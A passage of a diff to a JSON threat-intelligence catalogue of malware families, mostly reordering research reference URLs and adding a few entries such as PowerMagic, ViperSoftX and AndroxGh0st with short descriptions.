- "https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html",
- "https://objective-see.com/blog/blog_0x66.html"
+ "https://objective-see.com/blog/blog_0x66.html",
+ "https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html"
],
"synonyms": [],
"type": []
@@ -9517,9 +10008,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.antak",
- "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx",
+ "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html",
"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html"
+ "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx"
],
"synonyms": [],
"type": []
@@ -9532,8 +10023,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.aspxspy",
+ "https://attack.mitre.org/groups/G0096",
"https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells",
- "https://attack.mitre.org/groups/G0096"
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
],
"synonyms": [],
"type": []
@@ -9546,6 +10038,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.behinder",
+ "https://blog.gigamon.com/2022/09/28/investigating-web-shells/",
+ "https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md",
"https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/"
],
"synonyms": [],
@@ -9574,10 +10068,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode",
- "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf",
"https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf",
+ "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a"
],
"synonyms": [],
"type": []
@@ -9618,11 +10112,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.pas",
+ "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
"https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
- "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
+ "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [],
"type": []
@@ -9635,8 +10129,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.prometheus_backdoor",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://blog.group-ib.com/prometheus-tds"
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
],
"synonyms": [],
"type": []
@@ -9704,19 +10198,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
- "https://ironnet.com/blog/chirp-of-the-poisonfrog/",
- "https://nsfocusglobal.com/apt34-event-analysis-report/",
- "https://www.netscout.com/blog/asert/tunneling-under-sands",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/",
"https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
- "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/",
+ "https://ironnet.com/blog/chirp-of-the-poisonfrog/",
+ "https://www.netscout.com/blog/asert/tunneling-under-sands",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/"
+ "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/",
+ "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933",
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/",
+ "https://nsfocusglobal.com/apt34-event-analysis-report/",
+ "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/"
],
"synonyms": [
"Glimpse",
@@ -9732,8 +10226,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200",
- "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/",
- "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/"
+ "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/",
+ "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/"
],
"synonyms": [],
"type": []
@@ -9746,11 +10240,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://vblocalhost.com/uploads/VB2020-46.pdf",
- "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf"
+ "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [
"BoBoStealer"
@@ -9778,13 +10272,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode",
+ "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities",
"https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/",
- "https://www.certego.net/en/news/malware-tales-ftcode/",
- "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/",
- "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm",
"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md",
- "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities"
+ "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm",
+ "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/",
+ "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
+ "https://www.certego.net/en/news/malware-tales-ftcode/"
],
"synonyms": [],
"type": []
@@ -9797,22 +10291,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/",
"https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless"
+ "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "0a339826-d5f8-11e8-b520-5b93fe65a08e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0db05333-2214-49c3-b469-927788932aaa",
"value": "GhostMiner"
},
@@ -9821,23 +10306,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader",
- "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html",
+ "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html",
"https://blog.threatstop.com/upgraded-jasperloader-infecting-machines",
"https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html"
+ "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d8de6b56-9950-4389-83b8-4fc3262dc4c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "286a14a1-7113-4bed-97ce-8db41b312a51",
"value": "JasperLoader"
},
@@ -9873,11 +10349,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus",
- "https://isc.sans.edu/diary/rss/28628",
- "https://github.com/mhaskar/Octopus",
- "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://isc.sans.edu/diary/26918"
+ "https://github.com/mhaskar/Octopus",
+ "https://isc.sans.edu/diary/26918",
+ "https://isc.sans.edu/diary/rss/28628",
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf"
],
"synonyms": [],
"type": []
@@ -9890,9 +10366,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig",
+ "https://twitter.com/MJDutch/status/1074820959784321026?s=19",
"https://threatpost.com/oilrig-apt-unique-backdoor/157646/",
- "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html",
- "https://twitter.com/MJDutch/status/1074820959784321026?s=19"
+ "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html"
],
"synonyms": [],
"type": []
@@ -9905,8 +10381,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy",
- "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html",
- "https://github.com/matthewdunwoody/POSHSPY"
+ "https://github.com/matthewdunwoody/POSHSPY",
+ "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
],
"synonyms": [],
"type": []
@@ -9933,8 +10409,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper",
- "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/",
- "https://twitter.com/InQuest/status/1285295975347650562"
+ "https://twitter.com/InQuest/status/1285295975347650562",
+ "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/"
],
"synonyms": [],
"type": []
@@ -9947,8 +10423,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
],
"synonyms": [],
"type": []
@@ -10000,14 +10476,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower",
- "https://attack.mitre.org/groups/G0100/",
- "https://securelist.com/recent-cloud-atlas-activity/92016/",
- "https://attack.mitre.org/groups/G0100",
- "https://securelist.com/recent-cloud-atlas-activity/92016",
- "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
"https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability",
+ "https://attack.mitre.org/groups/G0100",
+ "https://unit42.paloaltonetworks.com/atoms/clean-ursa/",
+ "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "https://attack.mitre.org/groups/G0100/",
"https://unit42.paloaltonetworks.com/atoms/clean-ursa",
- "https://unit42.paloaltonetworks.com/atoms/clean-ursa/"
+ "https://securelist.com/recent-cloud-atlas-activity/92016",
+ "https://securelist.com/recent-cloud-atlas-activity/92016/"
],
"synonyms": [],
"type": []
@@ -10020,8 +10496,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
@@ -10040,15 +10516,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5629bc84-58eb-42d9-adc6-cd0eeb08ccaf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c07f6484-0669-44b7-90e6-f642e316d277",
"value": "PowerSpritz"
},
@@ -10057,25 +10524,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats",
- "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
- "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
- "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
"http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://unit42.paloaltonetworks.com/atoms/boggyserpens/",
- "https://blog.prevailion.com/2020/01/summer-mirage.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/",
- "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
"https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/",
- "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/",
- "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
"https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://unit42.paloaltonetworks.com/atoms/boggyserpens/",
+ "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
+ "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
+ "https://blog.prevailion.com/2020/01/summer-mirage.html",
+ "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/"
],
"synonyms": [
"Valyria"
@@ -10090,13 +10557,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
"https://www.symantec.com/security-center/writeup/2019-062513-4935-99",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
"https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
- "https://norfolkinfosec.com/apt33-powershell-malware/",
+ "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/",
"https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/"
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://norfolkinfosec.com/apt33-powershell-malware/"
],
"synonyms": [],
"type": []
@@ -10143,23 +10610,36 @@
"uuid": "f5fa77e9-9851-48a6-864d-e0448de062d4",
"value": "PowerZure"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.power_magic",
+ "https://securelist.com/bad-magic-apt/109087/?s=31"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7ee51054-1d3b-45ec-a7fd-1e212c891b99",
+ "value": "PowerMagic"
+ },
{
"description": "DLL loader that decrypts and runs a powershell-based downloader.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
- "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/",
- "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant",
- "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
- "https://unit42.paloaltonetworks.com/thanos-ransomware/",
"https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east"
+ "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
+ "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
+ "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://unit42.paloaltonetworks.com/thanos-ransomware/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
],
"synonyms": [],
"type": []
@@ -10199,11 +10679,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
"https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
- "https://youtu.be/pBDu8EGWRC4?t=2492",
"https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html"
+ "https://youtu.be/pBDu8EGWRC4?t=2492",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -10229,8 +10709,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin",
- "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/",
+ "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/",
"https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca"
],
"synonyms": [],
@@ -10270,19 +10750,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload",
- "https://blog.minerva-labs.com/sload-targeting-europe-again",
"https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
- "https://threatpost.com/sload-spying-payload-delivery-bits/151120/",
- "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/",
- "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
- "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/",
"https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
"https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
+ "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
+ "https://threatpost.com/sload-spying-payload-delivery-bits/151120/",
+ "https://blog.minerva-labs.com/sload-targeting-europe-again",
"https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan",
- "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/"
+ "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/",
+ "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
+ "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/",
+ "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/"
],
"synonyms": [
"Starslord"
@@ -10297,8 +10777,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy",
- "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/",
- "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/"
+ "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/",
+ "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/"
],
"synonyms": [],
"type": []
@@ -10363,8 +10843,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
- "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/"
+ "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/"
],
"synonyms": [],
"type": []
@@ -10385,17 +10865,30 @@
"uuid": "709ba4ad-9ec5-4e0b-b642-96db3b7f6898",
"value": "Unidentified PS 003 (RAT)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.vipersoftx",
+ "https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "15b551ea-b59a-40f9-a10f-6144415d2d5c",
+ "value": "ViperSoftX"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine",
- "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/",
- "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/",
- "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/",
"https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/",
"https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry",
- "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf"
+ "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/",
+ "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/",
+ "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf",
+ "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/"
],
"synonyms": [],
"type": []
@@ -10429,6 +10922,22 @@
"uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e",
"value": "WMImplant"
},
+ {
+ "description": "According to Laceworks, this is a SMTP cracker, which is primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework and the Laravel .env file is often targeted for its various configuration data including AWS, SendGrid and Twilio. AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.androxgh0st",
+ "https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/"
+ ],
+ "synonyms": [
+ "Androx",
+ "AndroxGhost"
+ ],
+ "type": []
+ },
+ "uuid": "e8f24c9c-c03c-4740-a121-d73789931c8e",
+ "value": "AndroxGh0st"
+ },
{
"description": "",
"meta": {
@@ -10460,13 +10969,13 @@
"meta": {
